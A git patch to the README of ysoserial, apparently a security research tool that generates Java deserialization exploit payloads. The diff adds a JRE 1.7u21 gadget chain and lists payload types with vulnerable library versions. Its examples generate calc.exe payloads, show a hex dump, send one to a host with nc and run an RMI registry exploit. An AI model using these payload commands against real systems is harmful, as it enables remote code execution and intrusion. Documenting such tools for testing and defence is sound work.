From ed18a40523887525fd717e3347262b6df31c43f5 Mon Sep 17 00:00:00 2001
From: Chris Frohoff <cfrohoff@qualcomm.com>
Date: Tue, 26 Jan 2016 17:27:19 -0800
Subject: [PATCH] updated README

---
 README.md | 22 +++++++++++++---------
 1 file changed, 13 insertions(+), 9 deletions(-)

diff --git a/README.md b/README.md
index 82faeb78..30501436 100644
--- a/README.md
+++ b/README.md
@@ -7,7 +7,8 @@ A proof-of-concept tool for generating payloads that exploit unsafe Java object
 
 ## Description
 
-Released as part of AppSecCali 2015 Talk ["Marshalling Pickles: how deserializing objects will ruin your day"](http://frohoff.github.io/appseccali-marshalling-pickles/) 
+Released as part of AppSecCali 2015 Talk ["Marshalling Pickles: how deserializing objects will ruin your day"](http://frohoff.github.io/appseccali-marshalling-pickles/). 
+Updated to include a [JRE <= 1.7u21 gadget chain](https://gist.github.com/frohoff/24af7913611f8406eaf3).
 
 __ysoserial__ is a collection of utilities and property-oriented programming "gadget chains" discovered in common java 
 libraries that can, under the right conditions, exploit Java applications performing __unsafe deserialization__ of objects. 
@@ -28,20 +29,23 @@ are not responsible or liable for misuse of the software. Use responsibly.
 ## Usage
 
 ```shell
-$ java -jar ysoserial-0.0.1-all.jar
+$ java -jar ysoserial-0.0.3-all.jar
 Y SO SERIAL?
 Usage: java -jar ysoserial-[version]-all.jar [payload type] '[command to execute]'
         Available payload types:
-                CommonsCollections1
-                CommonsCollections2
-                Groovy1
-                Spring1           
+                CommonsCollections1 [commons-collections:commons-collections:3.1]
+                CommonsCollections2 [org.apache.commons:commons-collections4:4.0]
+                CommonsCollections3 [commons-collections:commons-collections:3.1]
+                CommonsCollections4 [org.apache.commons:commons-collections4:4.0]
+                Groovy1 [org.codehaus.groovy:groovy:2.3.9]
+                Jdk7u21 []
+                Spring1 [org.springframework:spring-core:4.1.4.RELEASE, org.springframework:spring-beans:4.1.4.RELEASE]
 ```
 
 ## Examples
 
 ```shell
-$ java -jar ysoserial-0.0.1-all.jar CommonsCollections1 calc.exe | xxd
+$ java -jar ysoserial-0.0.3-all.jar CommonsCollections1 calc.exe | xxd
 0000000: aced 0005 7372 0032 7375 6e2e 7265 666c  ....sr.2sun.refl
 0000010: 6563 742e 616e 6e6f 7461 7469 6f6e 2e41  ect.annotation.A
 0000020: 6e6e 6f74 6174 696f 6e49 6e76 6f63 6174  nnotationInvocat
@@ -50,10 +54,10 @@ $ java -jar ysoserial-0.0.1-all.jar CommonsCollections1 calc.exe | xxd
 0000560: 6572 7269 6465 0000 0000 0000 0000 0000  erride..........
 0000570: 0078 7071 007e 003a                      .xpq.~.:
        
-$ java -jar ysoserial-0.0.1-all.jar Groovy1 calc.exe > groovypayload.bin
+$ java -jar ysoserial-0.0.3-all.jar Groovy1 calc.exe > groovypayload.bin
 $ nc 10.10.10.10 < groovypayload.bin
 
-$ java -cp ysoserial-0.0.1-all.jar ysoserial.RMIRegistryExploit myhost 1099 CommonsCollections1 calc.exe
+$ java -cp ysoserial-0.0.3-all.jar ysoserial.RMIRegistryExploit myhost 1099 CommonsCollections1 calc.exe
 ```
 
 ## Installation